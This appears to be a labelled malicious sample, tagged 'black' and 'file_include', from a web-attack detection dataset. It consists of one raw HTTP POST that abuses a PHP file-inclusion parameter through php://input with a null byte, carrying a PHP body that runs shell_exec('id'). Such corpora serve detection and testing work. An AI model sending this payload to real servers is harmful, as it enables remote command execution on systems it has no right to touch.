# tag: black,file_include
POST /index.php?page=php://input%00 HTTP/1.0
Host: 100.0.0.210:9999
Connection: close
Content-Length: 31
User-Agent: curl/7.86.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

<?php echo shell_exec('id'); ?>